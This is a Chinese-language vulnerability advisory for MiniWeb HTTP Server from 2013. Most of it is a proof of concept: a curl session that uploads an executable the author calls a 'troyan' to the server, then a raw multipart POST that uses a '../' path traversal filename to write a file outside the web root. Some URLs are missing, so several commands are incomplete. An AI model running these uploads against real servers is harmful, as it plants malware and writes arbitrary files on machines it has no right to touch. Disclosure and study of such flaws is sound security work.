发布日期:2013-04-09
更新日期:2013-04-10
受影响系统:
sourceforge MiniWeb HTTP Server 0.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58946
MiniWeb是一个针对嵌入式应用而开发的微型Web Server,用C语言编写。
MiniWeb HTTP Server 20130309及其他版本存在安全漏洞,攻击者利用该漏洞可上传恶意文件到服务器任意位置。
<*来源:Akastep
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Akastep ()提供了如下测试方法:
Arbitrary File Upload:
user@myhost /cygdrive/c/dir1/dir2
user@myhost /cygdrive/c/dir1/dir2
$ curl -I
curl: (52) Empty reply from server
user@myhost /cygdrive/c/dir1/dir2
$ curl
<html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='https://www.linuxidc.com/Linux/'>..</a></td><td width=15%><dir></td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr></
table><hr><i>Directory content generated by MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2
$ #Uploading remotely our troyan to remote system.
user@myhost /cygdrive/c/dir1/dir2
$ curl -i -F name=https://www.linuxidc.com/taskmgr.exe -F filedata=@taskmgr.exe
:8000/epicfail/
HTTP/1.1 404 Not Found
Server: MiniWeb
Content-length: 125
Content-Type: text/html
<html><head><title>404 Not Found</title></head><body><h1>Not
Found</h1><p>The requested URL has no content.</p></body></html>
user@myhost /cygdrive/c/dir1/dir2
$ #Now fetching directory index from remote system.
user@myhost /cygdrive/c/dir1/dir2
$ curl
<html><head><title>/</title></head><body><table border=0 cellpadding=0
cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='https://www.linuxidc.com/Linux/'>..</a></td><td width=15%><dir></td><td
width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr><t
r><td width=35%><a href='https://www.linuxidc.com/taskmgr.exe'>taskmgr.exe</a></td><td
width=15%>329 KB</td><td width=15%>exe file</td><td>Sun, 07 Apr 2013
00:14:38 GMT</td></tr></table><hr><i>Directory content generated by
MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2
user@myhost /cygdrive/c/dir1/dir2
$ #Lol our troyan (taskmgr.exe) uploaded successfully) This is design
flaw.
user@myhost /cygdrive/c/dir1/dir2
$ curl >task2.exe
user@myhost /cygdrive/c/dir1/dir2
$ file task2.exe
task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX
compressed
user@myhost /cygdrive/c/dir1/dir2
$ rm -rf task2.exe
METHOD: POST
URL:
Directory Traversal:
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101
Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------78522398122376
Content-Length: 84906
request body:
-----------------------------78522398122376
Content-Disposition: form-data;
-----------------------------78522398122376
Content-Disposition: form-data;
-----------------------------78522398122376
Content-Disposition: form-data;;
filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt"
Content-Type: image/png
Dude! Your machine OwnEd!
-----------------------------78522398122376
Content-Disposition: form-data;
Upload
-----------------------------78522398122376--
================================================================================
Few Printscreens:
1remotesystem.PNG
2attackersends.PNG
3remotesystempwned.PNG